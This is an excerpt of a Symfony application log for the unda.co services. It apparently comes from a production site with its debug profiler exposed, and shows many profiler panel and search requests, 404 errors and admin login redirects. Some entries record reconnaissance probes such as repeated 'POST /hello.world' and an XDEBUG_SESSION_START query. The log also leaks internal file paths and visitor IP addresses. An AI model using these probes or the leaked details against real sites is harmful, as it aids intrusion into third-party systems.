  369. [2025-12-16 01:46:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  370. [2025-12-16 01:46:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"266eb6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/266eb6?panel=time","method":"GET"} []
  371. [2025-12-16 01:46:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  372. [2025-12-16 01:49:13] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  373. [2025-12-16 01:49:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  374. [2025-12-16 01:49:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  375. [2025-12-16 01:49:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  376. [2025-12-16 01:49:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  377. [2025-12-16 01:49:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  378. [2025-12-16 01:49:13] security.DEBUG: Calling Authentication entry point. [] []
  379. [2025-12-16 01:51:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+i+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+i+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  380. [2025-12-16 01:55:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=time","method":"GET"} []
  381. [2025-12-16 01:55:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  382. [2025-12-16 01:56:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+a.getAttribute("" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+a.getAttribute(\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  383. [2025-12-16 02:03:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/forms/tinymce/'+e.documentBaseURI.toAbsolute(t)+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/forms/tinymce/'+e.documentBaseURI.toAbsolute(t)+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  384. [2025-12-16 02:04:46] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"344819","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/344819/search/results?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
  385. [2025-12-16 02:04:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.28.162&limit=10&method=GET","method":"GET"} []
  386. [2025-12-16 02:19:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9","method":"GET"} []
  387. [2025-12-16 02:19:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  388. [2025-12-16 02:20:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=66.249.66.45&limit=10","method":"GET"} []
  389. [2025-12-16 02:20:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=66.249.66.45&limit=10","method":"GET"} []
  390. [2025-12-16 02:22:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  391. [2025-12-16 02:31:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a2a520?panel=exception","method":"GET"} []
  392. [2025-12-16 02:31:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  393. [2025-12-16 02:34:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/fonts/glyphicons-halflings-regular.woff"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/fonts/glyphicons-halflings-regular.woff\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  394. [2025-12-16 02:38:20] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/fonts/glyphicons-halflings-regular.eot"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/fonts/glyphicons-halflings-regular.eot\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  395. [2025-12-16 02:41:49] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  396. [2025-12-16 02:42:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/plugins/misc/gallery/'+n+'"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/plugins/misc/gallery/'+n+'\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  397. [2025-12-16 02:51:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e41a6f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e41a6f?panel=db","method":"GET"} []
  398. [2025-12-16 02:51:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  399. [2025-12-16 02:53:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/fonts/glyphicons-halflings-regular.ttf"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/fonts/glyphicons-halflings-regular.ttf\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  400. [2025-12-16 02:54:09] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  401. [2025-12-16 02:54:09] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  402. [2025-12-16 02:54:09] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  403. [2025-12-16 02:54:09] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  404. [2025-12-16 02:54:09] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  405. [2025-12-16 02:54:09] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  406. [2025-12-16 02:54:09] security.DEBUG: Calling Authentication entry point. [] []
  407. [2025-12-16 02:55:40] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  408. [2025-12-16 02:55:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  409. [2025-12-16 02:55:53] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  410. [2025-12-16 02:56:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /login"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /login\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  411. [2025-12-16 02:56:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1f2b28","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1f2b28?panel=dump","method":"GET"} []
  412. [2025-12-16 02:56:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  413. [2025-12-16 02:59:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/css/fonts/fontawesome.eot"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/css/fonts/fontawesome.eot\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  414. [2025-12-16 03:09:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  415. [2025-12-16 03:09:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.81.10&limit=10&method=POST","method":"GET"} []
  416. [2025-12-16 03:18:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/css/fonts/fontawesome.woff"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/css/fonts/fontawesome.woff\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  417. [2025-12-16 03:21:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /assets/css/fonts/fontawesome.ttf"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /assets/css/fonts/fontawesome.ttf\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  418. [2025-12-16 03:22:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  419. [2025-12-16 03:25:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3152a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3152a","method":"GET"} []
  420. [2025-12-16 03:25:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  421. [2025-12-16 03:26:52] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  422. [2025-12-16 03:27:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  423. [2025-12-16 03:27:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  424. [2025-12-16 03:27:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  425. [2025-12-16 03:27:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  426. [2025-12-16 03:27:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  427. [2025-12-16 03:27:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  428. [2025-12-16 03:27:30] security.DEBUG: Calling Authentication entry point. [] []
  429. [2025-12-16 03:33:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d6c41d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d6c41d","method":"GET"} []
  430. [2025-12-16 03:33:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  431. [2025-12-16 03:34:29] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"006517","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/006517/search/results?ip=141.95.74.78&limit=10","method":"GET"} []
  432. [2025-12-16 03:34:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10","method":"GET"} []
  433. [2025-12-16 03:45:20] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  434. [2025-12-16 03:45:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  435. [2025-12-16 03:45:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  436. [2025-12-16 03:45:20] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  437. [2025-12-16 03:45:20] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  438. [2025-12-16 03:45:20] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  439. [2025-12-16 03:45:20] security.DEBUG: Calling Authentication entry point. [] []
  440. [2025-12-16 03:45:20] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  441. [2025-12-16 03:45:28] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"260090","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/260090?panel=db","method":"GET"} []
  442. [2025-12-16 03:45:28] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  443. [2025-12-16 03:47:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=time","method":"GET"} []
  444. [2025-12-16 03:47:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  445. [2025-12-16 03:57:47] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  446. [2025-12-16 04:10:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"01b850","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/01b850","method":"GET"} []
  447. [2025-12-16 04:10:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  448. [2025-12-16 04:14:13] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  449. [2025-12-16 04:17:58] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3fdca8","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3fdca8/search/results?ip=189.172.24.201&limit=10&method=GET","method":"GET"} []
  450. [2025-12-16 04:17:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.24.201&limit=10&method=GET","method":"GET"} []
  451. [2025-12-16 04:29:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /hello.world"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /hello.world\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  452. [2025-12-16 04:49:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"645f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/645f32","method":"GET"} []
  453. [2025-12-16 04:49:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  454. [2025-12-16 05:06:07] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e71d17","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/e71d17?panel=config","method":"GET"} []
  455. [2025-12-16 05:06:07] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  456. [2025-12-16 05:12:29] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"6310fa","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/6310fa/search/results?limit=10","method":"GET"} []
  457. [2025-12-16 05:12:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10","method":"GET"} []
  458. [2025-12-16 05:13:09] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?XDEBUG_SESSION_START=phpstorm","method":"GET"} []
  459. [2025-12-16 05:16:57] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  460. [2025-12-16 05:21:48] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  461. [2025-12-16 05:22:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
  462. [2025-12-16 05:22:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=195.26.248.160&limit=10&method=POST","method":"GET"} []
  463. [2025-12-16 05:23:09] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"a9a058","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/a9a058/search/results?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
  464. [2025-12-16 05:23:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=141.95.74.78&limit=10&method=POST","method":"GET"} []
